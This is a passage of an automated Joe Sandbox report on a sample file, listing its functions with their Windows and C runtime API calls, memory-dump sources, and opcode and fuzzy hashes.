                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00A729AB
                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A729FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                        • String ID: bad locale name
                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                        • Opcode ID: 17c5c674613c72e9360b78a7e2f05edfd762423a5646e581a7737eefd9850bb4
                                                                                                        • Instruction ID: ab1c86aeb84b237817a66e332c1a86d33ebf3e7df1030df1b54232dd3c729a8d
                                                                                                        • Opcode Fuzzy Hash: 17c5c674613c72e9360b78a7e2f05edfd762423a5646e581a7737eefd9850bb4
                                                                                                        • Instruction Fuzzy Hash: 1211A071904B849FD320CF69C901747BBF4EF19710F008A6EE499D7B81D7B5A504CB95
                                                                                                        Function 00A845EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NetApiBufferFree.NETAPI32(00000000), ref: 00A84606
                                                                                                        • NetApiBufferFree.NETAPI32(00000000), ref: 00A84622
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BufferFree
                                                                                                        • String ID: Default
                                                                                                        • API String ID: 710964542-753088835
                                                                                                        • Opcode ID: 3a16fef91b96c75a33301aa7941a509c3be718f4cd48c3e246803160f8645c2e
                                                                                                        • Instruction ID: d61133c36510053c9e1a69812f48b739f81bfb85322d6315eecc0bc42c20382d
                                                                                                        • Opcode Fuzzy Hash: 3a16fef91b96c75a33301aa7941a509c3be718f4cd48c3e246803160f8645c2e
                                                                                                        • Instruction Fuzzy Hash: 0BF04F31A0520A9BDB18EF58E591BADF7B1EB4D321F14427ED81663690EB36A9008B90
                                                                                                        Function 00B35628 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 004d4438c54c38b1471e2c6b9a55bdee31e1276da741325f1821c07df276dfe1
                                                                                                        • Instruction ID: 8444023c7ffad0da687da457eb9c650b8f34718bfe9840d5203d834d232d3103
                                                                                                        • Opcode Fuzzy Hash: 004d4438c54c38b1471e2c6b9a55bdee31e1276da741325f1821c07df276dfe1
                                                                                                        • Instruction Fuzzy Hash: A8519171D10A19EBDB319FA8D885FEE7BF8EF05324F640099E414A7291D7709941CBA1
                                                                                                        Function 00B3595D Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,00AE8F4C,?,00B3587B,00AE8F4C,00B8CE88,0000000C), ref: 00B359B3
                                                                                                        • GetLastError.KERNEL32(?,00B3587B,00AE8F4C,00B8CE88,0000000C), ref: 00B359BD
                                                                                                        • __dosmaperr.LIBCMT ref: 00B359E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2583163307-0
                                                                                                        • Opcode ID: 74ddfe6799f75db100cfa70433fe852fd977ee75673985645a35b832b9381d92
                                                                                                        • Instruction ID: 96974c2438547b22511068f04c391ac24f5bf0bb8a01ca58a2d144e35fb9d248
                                                                                                        • Opcode Fuzzy Hash: 74ddfe6799f75db100cfa70433fe852fd977ee75673985645a35b832b9381d92
                                                                                                        • Instruction Fuzzy Hash: E8014937604A309AD63427B8AC8577E7BC9CB8AB34F3907DAF8189B1D1DE21DC81C250
                                                                                                        Function 00B38F5D Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00AE8F76,00000000,00000002,00AE8F76,00000000,?,?,?,00B3900C,00000000,00000000,00AE8F76,00000002), ref: 00B38F96
                                                                                                        • GetLastError.KERNEL32(?,00B3900C,00000000,00000000,00AE8F76,00000002,?,00B2AA52,?,00000000,00000000,00000001,?,00AE8F76,?,00B2AB07), ref: 00B38FA0
                                                                                                        • __dosmaperr.LIBCMT ref: 00B38FA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2336955059-0
                                                                                                        • Opcode ID: 737278ab5b0dbdbf2d6d4992bb730991cd6cf0fd7f5a7e3fb3b0f1d2298fa63c
                                                                                                        • Instruction ID: 0f1e689a8728e488ef769869c4559cb2a0bde347e69057c5bdc342d760576bbe
                                                                                                        • Opcode Fuzzy Hash: 737278ab5b0dbdbf2d6d4992bb730991cd6cf0fd7f5a7e3fb3b0f1d2298fa63c
                                                                                                        • Instruction Fuzzy Hash: 26014032610714ABCB059FA8EC05DAE7B9AEB85330F380285F815972D0EE71ED50CBD1
                                                                                                        Function 00A86808 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163filenetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00A86821
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileInternetRead
                                                                                                        • String ID: `
                                                                                                        • API String ID: 778332206-3189776409
                                                                                                        • Opcode ID: da8e55eb114dd8a61b29364797d920febfa3170e30017a8cb595c3da8fd24baa
                                                                                                        • Instruction ID: 381cb23aa8215778670d5b410fe08c287db019b461ad03f2e415f4f7f4720dfa
                                                                                                        • Opcode Fuzzy Hash: da8e55eb114dd8a61b29364797d920febfa3170e30017a8cb595c3da8fd24baa
                                                                                                        • Instruction Fuzzy Hash: 5151A4B1A101588BEB28DF24CD847DDB7B5EF85304F1482D9E508A7281D775AEC8CF59
                                                                                                        Function 00A84420 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,00000000), ref: 00A8444D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                        • Opcode ID: 2493c67e3dabb21e8a518858089848d5666f987c4f717da13190cf62c7dc3c8c
                                                                                                        • Instruction ID: 1528ec01d1dd7911f3a5bf182b86311f4ec46595d149bf96acbe7c10f2ec83b5
                                                                                                        • Opcode Fuzzy Hash: 2493c67e3dabb21e8a518858089848d5666f987c4f717da13190cf62c7dc3c8c
                                                                                                        • Instruction Fuzzy Hash: A521C071A14B449BC221EF38DD42B1BB7F5AF9AB40F400B1DF485A7252EB70A8548BD2
                                                                                                        Function 00B35243 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,00B2AB2E,E0830C40,?,00B3577F,00AE8F76,00B2AB2E,?,00B2AB2E,00B2AB2E,00AE8F76), ref: 00B352DE
                                                                                                        • GetLastError.KERNEL32(?,00B3577F,00AE8F76,00B2AB2E,?,00B2AB2E,00B2AB2E,00AE8F76,00B2AB2E,?,00B8CE68,00000014,00B21B64,00000000,8304488B,00AE8F76), ref: 00B35307
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 442123175-0
                                                                                                        • Opcode ID: 0df84d1244b227940b92ba7945be8aded46b1e47c5bb014bfb9a8bd06e9358ee
                                                                                                        • Instruction ID: 4edbe8ef0b72d393b1223d0ae2dad622ab1eef7db02e345c8e8561e7e1962268
                                                                                                        • Opcode Fuzzy Hash: 0df84d1244b227940b92ba7945be8aded46b1e47c5bb014bfb9a8bd06e9358ee
                                                                                                        • Instruction Fuzzy Hash: D3217E356007199FCB25CF59CC80BEAB7F9EB48342F2004EAE546D7251DB70AE85CB64
                                                                                                        Function 00AE8F8D Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Xfsopenstd::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2914972069-0
                                                                                                        • Opcode ID: 3fdc7c13eba57e24e35d720d01d069c9123a3d3394c950bb968f5b6826f71d68
                                                                                                        • Instruction ID: 31cdf724fd077dc4d97e3903e9786de97201feffb3e184b512ac332fab001930
                                                                                                        • Opcode Fuzzy Hash: 3fdc7c13eba57e24e35d720d01d069c9123a3d3394c950bb968f5b6826f71d68
                                                                                                        • Instruction Fuzzy Hash: 2C118832B0429167CB25172BED06BBA379B9F42790F088074FC0D961A5EE3CCC02C290
                                                                                                        Function 00B33B5D Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00B33BA9
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00B33BBB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3000768030-0
                                                                                                        • Opcode ID: f53c3e4eb08d0bbeb8a7c6acfbd75dff9ccf0cdecb17d63fdad7ecabf44f9319
                                                                                                        • Instruction ID: 39f13a0584b0e28c90bcb5e486bc45f543e06e2934d60255f05e52fb3654a65f
                                                                                                        • Opcode Fuzzy Hash: f53c3e4eb08d0bbeb8a7c6acfbd75dff9ccf0cdecb17d63fdad7ecabf44f9319
                                                                                                        • Instruction Fuzzy Hash: 1D116071508B824BD7304A3E9C88623FAD4DB56B30F39079AD0B7965F2DA34DA859640
                                                                                                        Function 00A85D90 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalMemoryStatusEx.KERNEL32(AE695AF0), ref: 00A85DAF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                        • String ID:
                                                                                                        • API String ID: 1890195054-0
                                                                                                        • Opcode ID: 0a1ebb07b16c13bb95f83903a26f09bcf4cea840bdf3418f0a0dc4b2aed9d32b
                                                                                                        • Instruction ID: c3e405d264553ea36b4f7855a5d37bda653b88187f30ce8927f69162a35ae0b9
                                                                                                        • Opcode Fuzzy Hash: 0a1ebb07b16c13bb95f83903a26f09bcf4cea840bdf3418f0a0dc4b2aed9d32b
                                                                                                        • Instruction Fuzzy Hash: A0115E30B14B044BEA14BB34DD9233EB3E4DB55711F4405ADED8A877C1EB6AED108786
                                                                                                        Function 00B34AF6 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wsopen_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3347428461-0
                                                                                                        • Opcode ID: 78e26c4cc661f890ac97ebc7a8c745fa911848a52cafb1fc111fb97a43a02e0f
                                                                                                        • Instruction ID: 068fbb80eed305ec9671801577fa9b6fb00ad7a70d958543b497c96aebacc546
                                                                                                        • Opcode Fuzzy Hash: 78e26c4cc661f890ac97ebc7a8c745fa911848a52cafb1fc111fb97a43a02e0f
                                                                                                        • Instruction Fuzzy Hash: C3112E75904109AFCF05DF58E941E9B7BF4EF49310F114499F805AB311D731E911CBA5
                                                                                                        Function 00B34B7B Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wsopen_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3347428461-0
                                                                                                        • Opcode ID: df97376b725b56e590998e9c01c0648d5ceef8aa8c471e80e238429b58180504
                                                                                                        • Instruction ID: 115d55f1dc17688f3a3950688da070ed5a99585bd8663451bce1ce334612e498
                                                                                                        • Opcode Fuzzy Hash: df97376b725b56e590998e9c01c0648d5ceef8aa8c471e80e238429b58180504
                                                                                                        • Instruction Fuzzy Hash: 1D112E7190410AAFCF05DF58E941A9B7BF5FF48310F104099F808AB312DB71E915CBA5
                                                                                                        Function 00B21D34 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fdda3eeaaeb209e15c66a46a25a7ed506e6a5ebcfd1ec3d6670bf254339221b4
                                                                                                        • Instruction ID: 222dc68620312061f86b8c8041ef3318156ac63044fe1167f9950460eafd1021
                                                                                                        • Opcode Fuzzy Hash: fdda3eeaaeb209e15c66a46a25a7ed506e6a5ebcfd1ec3d6670bf254339221b4
                                                                                                        • Instruction Fuzzy Hash: 83F0F432501A30AAD6316A2DAC05B6A32D88FA2375F200BA5F46C921D1DB75E90286A1
                                                                                                        Function 00B30673 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B34D09: HeapAlloc.KERNEL32(00000008,?,00000000,?,00B3442F,00000001,00000364,?,00B17B27,?,?,?,?,?,00A71F07,?), ref: 00B34D4A
                                                                                                        • _free.LIBCMT ref: 00B30693
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocErrorFreeLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3091179305-0
                                                                                                        • Opcode ID: 146b8ef1faef4f6236f5c33e25ef9eb2b68895810266869314034d0ecb4ff49d
                                                                                                        • Instruction ID: 888c861d2308f0ae719be97efee603360ce366e823574d75789ecc872ede1575
                                                                                                        • Opcode Fuzzy Hash: 146b8ef1faef4f6236f5c33e25ef9eb2b68895810266869314034d0ecb4ff49d
                                                                                                        • Instruction Fuzzy Hash: 11F03C76A01209AFC310EFA9D442B5ABBF4EF48710F2041A6E918D7341E771AE108BD1
